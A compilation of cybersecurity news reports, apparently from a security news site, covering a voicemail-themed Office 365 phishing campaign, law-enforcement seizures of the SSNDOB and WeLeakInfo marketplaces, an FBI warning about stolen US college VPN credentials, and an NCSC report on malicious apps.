The researchers stated this month that the recent wave targets US organizations across various industries, including software security, security solution providers, the military, healthcare and pharmaceuticals, and the manufacturing and shipping supply chain. 

An email is where it all begins

Attackers inform recipients of missed voicemails via email notifications that contain links to web-based attachments. Although many people don't check voicemail, audio messages on LinkedIn and WhatsApp have been there for a while, so using them to deceive consumers into clicking a link in an email can be successful. 

Naturally, when the target clicks the link, they are taken to a credential phishing web page hosted on Japanese servers rather than a voicemail at all. The user gets directed to the Microsoft Office website or the Wikipedia page if the encoded email address at the end of the URL is missing.

The user is shown the final page, which is an Office 365 phishing page after they have correctly supplied the CAPTCHA information. The 2020 campaign Zscaler tracked using the same approach. 

"Since they can persuade the victims to open the email attachments, voicemail-themed phishing attacks continue to be an effective social engineering strategy for attackers. This, together with the use of evasion techniques to get around automatic URL inspection tools, aids the threat actor in acquiring the users' credentials more successfully "reports Zscaler ThreatLabz

Microsoft 365 Remains a Popular Victim 

In a 2022 Egress research titled "Fighting Phishing: The IT Leader's View," it was found that 40% of firms utilizing Microsoft 365 reported becoming victims of credential theft, and 85% of organizations using Microsoft 365 reported being victims of phishing in the previous 12 months. 

As the majority of businesses quickly transitioned to a primarily remote-work style, with many workers working from their homes, phishing usage continued to increase. It peaked during the peak of the COVID-19 pandemic in 2020 and 2021. 

A substantial majority of credentials have been successfully compromised by the effort, which can be utilized for a number of different cybercrime endgames. These consist of taking control of accounts to gain access to files and data theft to send malicious emails that appear to be from a legitimate organization, and implanting malware,. The goal is to trick victims into using the same passwords for several accounts by adding the user ID/password combinations to credential-stuffing lists. 

A rich mine of data that may be downloaded in bulk can usually be found in Microsoft 365 accounts, according to Robin Bell, CISO of Egress. Hackers may also use compromised Microsoft 365 accounts to send phishing emails to the victim's contacts in an effort to boost the success of their attacks.

Feds Take Down SSNDOB Marketplace for Selling Private Data of 24 Million US Citizens

 

SSNDOB, an illicit online marketplace that sold private details of nearly 24 million US citizens, has been taken down following an international law enforcement operation conducted by the FBI, the Internal Revenue Service, the Department of Justice, and Cyprus Police. 

The feds seized four domains hosting the SSNDOB marketplace as part of this operation: "ssndob.ws," "ssndob.vip," "ssndob.club," and "blackjob.biz." 

According to the DOJ, the leaked details included names, dates of birth, SSNs and credit card numbers and generated more than $19 million in revenue. 

"A series of websites that operated for years and were used to sell personal information, including the names, dates of birth, and Social Security numbers belonging to individuals in the United States. The SSNDOB Marketplace has listed the personal information for approximately 24 million individuals in the United States, generating more than $19 million USD in sales revenue," DOJ stated. 

While the website also sold UK citizens' birth dates, it was primarily used to sell the private data of US people for as little as $0.50. 

According to cybersecurity firm Advanced Intel, most of the data was stolen via healthcare and hospital data breaches. Subsequently, the attackers used the information to launch a financial scam. 

"SSNDOB was one of the largest crime shops offering a collection of personally identifiable information for fraudsters and played an integral part in fraud schemes. The majority of the customers used the shop data for various types of scams from tax to bank fraud," AdvIntel CEO Vitali Kremez explained. 

Chainalysis, a blockchain analysis firm, published its own report on the SSNDOB incident revealing that the marketplace received approximately $22 million worth of Bitcoin across over 100,000 transactions since April 2015, though the marketplace is believed to have been operating since at least 2013. 

However, one of the most interesting details researchers identified was a link between SSNDOB and Joker's Stash, which shut down its operations voluntarily in January 2021 due to increased pressure from law enforcement agencies, disruptions due to COVID-19, and the decreasing quality of stolen credit cards. 

"Perhaps most interesting of all though is the activity we see between SSNDOB and Joker’s Stash, a large darknet market focused on stolen credit card information and other PII that shut down in January 2021," explains Chainalysis' report. Between December 2018 and June 2019, SSNDOB sent over $100,000 worth of Bitcoin to Joker’s Stash, suggesting the two markets may have had some relationship to one another, including possibly shared ownership."

U.S. Agencies Seize Domains Employed for Selling Credentials

 

Earlier this week, the U.S. Department of Justice and the FBI announced that they seized three domains selling compromised personal information and launching cyber assaults on victim networks. 

The specific domains seized were weleakinfo.to, ipstress.in, and ovh-booter.com — the first of which allowed its users to traffic compromised personal data and offered a searchable database containing illegally amassed information obtained from over 10,000 data breaches. The other two domains offered DDoS-for-hire services to their users. 

The domains were taken down as part of an international investigation, in which the National Police Corps of the Netherlands and the Federal Police of Belgium arrested the primary suspect, searched several locations, and seized the underlying infrastructure. 

The weleakinfo.to domain offered access to seven billion records containing private data such as names, phone numbers, usernames, email addresses, and passwords. 

The seizure of this domain comes roughly two years after the FBI and the US Department of Justice took control of the internet domain name weleakinfo.com, which offered identical services. 

"Today, the FBI and the Department stopped two distressingly common threats: websites trafficking in stolen personal information and sites which attack and disrupt legitimate internet businesses," stated Matthew M. Graves, U.S. Attorney for the District of Columbia. “With the execution of the warrant, the seized domain names – weleakinfo.to and the related domains – are now in the federal government's custody, effectively suspending the website’s operation.” 

 "Cybercrime often crosses national borders. Using strong working relationships with our international law enforcement partners, we will address crimes like these that threaten privacy, security, and commerce around the globe." 

According to the DOJ, it remains unclear how long the weleakinfo.to the domain was in operation. Still, the website developed a reputation for selling names, email addresses, usernames, phone numbers, and passwords for online accounts to cybercriminals who would buy a subscription for a period of one day, one week, one month, three months, or a lifetime. 

Two years ago in January 2020, the FBI and the US DOJ announced the seizure of the WeLeakInfo.com domain, used in similar cybercrime activity. Just as WeLeakInfo.to, it also offered subscriptions, allowing customers to search 12 billion indexed records for specific information exposed in thousands of data breaches.

FBI Warns of Hackers Selling US College VPN Credentials on Underground Forums

 

Threat actors are advertising network credentials and virtual private network (VPN) access for colleges and universities based in the United States on underground and public criminal marketplaces. 

Last week, the Federal Bureau of Investigation (FBI) issued an advisory regarding usernames and passwords giving access to colleges and universities based in the U.S. that are put up for sale on Russian cybercriminal platforms. The price of stolen credentials varies between a few U.S. dollars to thousands. 

Hackers use several tactics such as ransomware and spear-phishing, to execute credential harvesting attacks and sell them on Russian hacking forums. The credentials allow hackers to launch brute-force attacks to infiltrate into victim accounts spanning different accounts, internet sites, and services. 

"If attackers are successful in compromising a victim account, they may attempt to drain the account of stored value, leverage or re-sell credit card numbers and other personally identifiable information, submit fraudulent transactions, exploit for other criminal activity against the account holder, or use for subsequent attacks against affiliated organizations," the FBI warned. 

Last year in May, the agency said it identified more than 36,000 email and password combinations for email accounts ending in the ".edu" domain publicly available on an instant messaging platform posted by a group that specialized in the trafficking of stolen login credentials. 

According to Emsisoft threat analyst Brett Callow, 10 of the 13 attacks on colleges this year involved data exfiltration. Ohlone College, Savannah State University, University of Detroit Mercy, Centralia College, Phillips Community College of the University of Arkansas, Florida International University, and Stratford University are just a few of the schools impacted by ransomware this year. 

Security tips 

The FBI advises academic institutions to liaise with their local FBI Field Office and update their incident response and communication plans. Implementing brute-force protection, training sessions for students and faculty to identify phishing attempts, using strong, unique passwords, and multi-factor authentication are regular recommendations that are valid for all organizations. 

"Universities, especially, should be providing students and staff with training to spot convincing phishing emails and the steps to undertake when opening various attachments or emails. Students are an easy target because unlike in a work environment, they often lack the necessary understanding to spot these types of attacks," stated Steven Hope, CEO, and co-founder of password management firm Authlogics.

NCSC Warns Of Threats Posed By Malicious Apps

 

A new report by the UK's National Cyber Security Centre (NCSC) has alerted of the threats posed by malicious applications. While most people are familiar with apps downloaded to smartphones, they are also available on everything from smart TVs to smart speakers. 

The government is seeking input on new security and privacy guidelines for applications and app stores. Ian Levy, the NCSC's technical director, stated app stores could do more to improve security. Cybercriminals are currently exploiting vulnerabilities in app stores on all types of linked devices to cause harm,  as per Mr Levy. 

Android phone users downloaded apps containing the Triada and Escobar malware from various third-party app stores last year, according to the FBI.  "This resulted in cyber-criminals remotely taking control of people's phones and stealing their data and money by signing them up for premium subscription services," it said.

The NCSC's report noted that apps "can also be installed on laptops, computers, games consoles, wearable devices (such as smartwatches or fitness trackers), smart TVs, smart speakers (such as Alexa devices), and IoT (internet of things) devices". It includes an example of a security firm illustrating how it could construct a malicious app for a prominent fitness tracker that could be downloaded via a link that seemed legitimate because it used the company's web address. 

Spyware/stalkerware capable of stealing anything from location to personal body data was found in the app. After the security firm alerted the company, it proceeded to rectify the situation. 

 The thirst for applications grew during the pandemic, according to the NCSC research, with the UK app market currently valued at £18.6 billion ($23.2 billion). The government's proposal to ask app retailers to commit to a new code of practice outlining baseline security and privacy requirements is supported by the cyber-security centre. 

"Developers and store operators making apps available to UK users would be covered. This includes Apple, Google, Amazon, Huawei, Microsoft and Samsung," the government stated.

 A new code of practice would require retailers to set up procedures to find and repair security problems more quickly.